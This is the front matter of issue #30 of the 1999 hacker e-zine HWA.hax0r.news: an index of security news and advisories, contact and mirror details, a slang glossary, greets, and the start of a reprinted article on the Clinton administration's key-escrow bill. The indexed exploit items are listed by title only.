[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== New mirror sites http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #30 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #30 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Key Escrow bill up for vote again................................ 04.0 .. The lost art of IRC warfare using eggdrop bots................... 05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1 06.0 .. The State of Crypto today........................................ 07.0 .. Using a backdoor in a firewalled system.......................... 08.0 .. PacketStorm Security Sells Out?.................................. 09.0 .. CryptoGram Aug 15th '99.......................................... 10.0 .. TELNET.EXE HEAP OVERFLOW......................................... 11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE.................... 12.0 .. THE MUSIC INDUSTRIES' "CYBER-SHERRIF"............................ 13.0 .. ReDaTtAcK CHARGED ANYWAYS........................................ 14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE............................. 15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET........... 16.0 .. E-COMMERCE AND PRIVACY........................................... 17.0 .. IDENTITY-THEFT................................................... 18.0 .. Y2K-THE MOVIE.................................................... 19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES......................... 20.0 .. Y2K PROBLEMS..................................................... 21.0 .. GISB WILL USE PGP................................................ 22.0 .. SURF ANONYMOUS FOR $5............................................ 23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER............ 24.0 .. PROJECTGAMMA BACK ONLINE......................................... 25.0 .. DETECTING INTRUDERS IN LINUX..................................... 26.0 .. WIRELESS CRIME-FIGHTING.......................................... 27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS.............................. 28.0 .. JAPAN CLEARS WIRETAP BILL........................................ 29.0 .. Warez Groups Hit With Racketeering Charges ...................... 30.0 .. Public UK Sites Susceptible to Attack ........................... 31.0 .. Mitnick Prosecutor Moving to Private Practice ................... 32.0 .. NIPC Head Talks About FidNet .................................... 33.0 .. Spoofing revisited (w00w00)...................................... 34.0 .. 2 Swedish men charged with hacking U.S computers................. 35.0 .. Feds delay network............................................... 36.0 .. The Effects of War on the Yugoslavian Network ................... 37.0 .. Survey Finds Internet Full of Holes ............................. 38.0 .. Hacking Into an IT Career........................................ 39.0 .. SETI@Home, Largest Computation Ever ............................. 40.0 .. Hong Kong Blondes Labeled a Fraud ............................... 41.0 .. Peace Prize Winner Warns of Cyber War ........................... 42.0 .. Mitnick Still Denied Kosher Food ................................ 43.0 .. Cable Pirates Busted ............................................ 44.0 .. CSIS Admits Web Defacement ...................................... 45.0 .. Win32.Kriz Set To Go Off Christmas Day .......................... 46.0 .. MS Windows Media Audio Broke One Day After Release .............. 47.0 .. Available Soon, Freedom! ........................................ 48.0 .. AOL hacking IM users?............................................ 49.0 .. Anti-gay site is hacked.......................................... 50.0 .. Indonesian CyberWar? Or Not? .................................... 51.0 .. Gov Wants to Break Into to Personal Computers, Legally ,,,,,,,,,, 52.0 .. Hearings to be Held on Echelon .................................. 53.0 .. AOL Password Scam Uncovered ..................................... 54.0 .. Bronc's Defcon VII Review ....................................... 55.0 .. Y2K Survival Catalog ............................................ 56.0 .. BELGIAN BANK COMPROMISED......................................... 57.0 .. CARDING IN NEWCASTLE............................................. 58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge.... 59.0 .. Watching the digital detectives.................................. 60.0 ,, Microsoft acknowledges software glitch that exposes e-mail passwords 61,0 .. U.S to seek new computer surveillance power...................... 62.0 .. Code cracker worries cryptographers.............................. 63.0 .. AntiOnline offers infosec website hosting........................ 64.0 .. PKI yesterday, today and tomorrow................................ 65.0 .. Microsoft Advisory, double byte code page vulnerability.......... 66.0 .. RHSA denial of service attack in in.telnetd...................... 67.0 .. [EuroHaCk] stealth-code.......................................... 68.0 .. RHSA; buffer overflow in libtermcap tgetent().................... 69.0 .. Possible AOL IM buffer overflow.................................. 70.0 .. L0pht security advisory:Attackers can remotely add default route entries 71.0 .. Setuid bug in Oracle ............................................ 72.0 .. Vulnerability In LSA on Windows NT SP5........................... 73.0 .. w00w00's efnet ircd advisory (exploit included).................. 74.0 .. hiperbomb.c - reboot a hiperarc router........................... 75.0 .. HP Security Bulletins Digest..................................... 76.0 .. cfingerd exploit.................................................. 77.0 .. Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding" =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest�� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 �� ISSN� 1004-042X �� Editor: Jim Thomas (cudigest@sun.soci.niu.edu) �� News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) �� Archivist: Brendan Kehoe �� Poof Reader:�� Etaion Shrdlu, Jr. �� Shadow-Archivists: Dan Carosone / Paul Southworth �� Ralph Sims / Jyrki Kuoppala �� Ian Dickinson �� Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #30... no comments this issue ... * * * * * * send submissions to: hwa@press.usmc.net */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Key-Escrow on the Move - Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hackernews.com/ contributed by evilwench They aren't giving up. The Cyberspace Electronic Security Act is currently being drafted by the Clinton administration. In this latest bill, the administration proposes that law enforcement agents have access to decryption keys held by recovery agents. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents. (Maybe the feeling is that if they keep submitting new bills, one of them, eventually, will get through. Unfortunately they are probably correct.) Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html AUGUST 16, 1999 Bill reopens encryption access debate BY DOUG BROWN (dbrown@fcw.com) AND L. SCOTT TILLETT (scott_tillett@fcw.com) Renewing efforts to allow law enforcement agencies to access and read suspected criminals' encrypted electronic files, the Clinton administration has drafted a bill that would give those agencies access to the electronic "keys" held by third parties. The Cyberspace Electronic Security Act, the drafting of which is being led by the Office and Management and Budget and the Justice Department, "updates law enforcement and privacy rules for our emerging world of widespread cryptography," according to an analysis accompanying the bill obtained by Federal Computer Week. Encryption technology, according to the draft, is "an important tool for protecting the privacy of legitimate communications and stored data" but also has been used "to facilitate and hide unlawful activity by terrorists, drug traffickers, child pornographers and other criminals." The new bill seeks to uncover that activity by allowing law enforcement officials to obtain the keys needed to decrypt messages by applying for search warrants or court orders, much as they might do to uncover other evidence. The administration is concerned about the use of encryption technology because advances in recent years have made it extremely difficult for law enforcement officials to crack a code once they have intercepted a message. The draft bill is the Clinton administration's latest effort to push for legislation that would make it easier for law enforcement agencies to intercept messages or data that they think would be helpful in criminal investigations. In 1993 the administration introduced the Clipper Chip, a hardware-based encryption device designed to protect private communications but that would provide a "backdoor" for law enforcement officials to decrypt necessary data. The Clipper effort died after privacy groups and industry warned that law enforcement agencies could abuse the power. "All this is the Clipper Chip revisited in a different flavor but not as effective," said Michael Anderson, president of computer forensics firm New Technologies Inc. The administration also has blocked the export of certain advanced encryption technology that would defeat efforts to conduct digital wiretaps as part of its fight against international drug cartels and terrorists. But the software industry continues to fight for the lifting of export restrictions. In the latest bill, the administration proposes that law enforcement agents have access - under limited circumstances - to decryption keys held by recovery agents, which are third-party warehouses of decryption keys that "unlock" complex codes that mask the readable form of the data. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents. The proposed bill would provide new protections for lawful users of encryption. Currently, according to a summary of the bill that is part of a proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws guiding how recovery agents treat the decryption keys they store. The bill would prohibit recovery agents from disclosing the keys or from using the keys to decrypt data except under certain circumstances, such as when a lawful heir of a deceased person wants decryption keys to the deceased's locked information. The draft bill also prohibits recovery agents from selling or revealing in any way their customer lists to other parties. The new protections, however, are not strong enough to avoid the erosion of privacy rights, said David Sobel, general counsel for the Electronic Privacy Information Center, an advocacy group based in Washington, D.C. "It is not a pro-encryption proposal," he said. "The bottom line is: This is legislation that would increase law enforcement's ability to access encrypted data." It also would serve to lay the legal groundwork for eventually outlawing encryption that does not have decryption keys available to law enforcement, Sobel said. "They could say, 'We have established legal procedures in place, they have been used in several cases. Now our problem is not everybody is using encryption that provides us with...access,' " he said. Barbara Simons, 